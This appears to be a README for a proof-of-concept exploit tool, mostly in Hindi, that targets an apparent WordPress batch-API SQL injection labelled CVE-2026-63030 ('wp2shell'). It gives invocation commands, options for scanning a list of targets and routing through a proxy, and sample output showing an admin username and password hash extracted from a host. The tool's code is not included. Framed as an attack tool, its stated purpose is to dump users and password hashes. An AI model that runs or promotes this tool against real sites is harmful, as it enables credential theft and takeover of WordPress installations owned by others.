
CVE-2026-63030 (wp2shell) POC.
WordPress Batch API Desynchronization SQL Injection Exploit
CVE-2026-63030 (wp2shell) भेद्यता के माध्यम से उपयोगकर्ताओं और पासवर्ड हैश को निकालने के लिए प्रूफ ऑफ कॉन्सेप्ट उपकरण।
python POC.py <target_url> [options]
python POC.py --rest-route http://target.com
| Argument | Description | Default |
|---|---|---|
target | एकल लक्ष्य URL | - |
-l, --list | लक्ष्यों की सूची वाली फ़ाइल (प्रति पंक्ति एक) | - |
--prefix | डेटाबेस तालिका उपसर्ग | wp_ |
--rest-route | ?rest_route= का उपयोग करें | अक्षम |
--timeout | अनुरोध टाइमआउट (सेकंड) | 30 |
--proxy | HTTP प्रॉक्सी (Burp/ZAP संगत) | कोई नहीं |
--max-len | अधिकतम निष्कर्षण लंबाई | 255 |
[*] Scanning: http://127.0.0.1/
[*] 1 users found
[+] ID:1 User:admin Hash:$wp$2y$10$Z6gwPduKb7wAbm0bHht1be7SxrgbyxgnbPmTVcVz9nP1KBX811xQy
[*] Requests: 553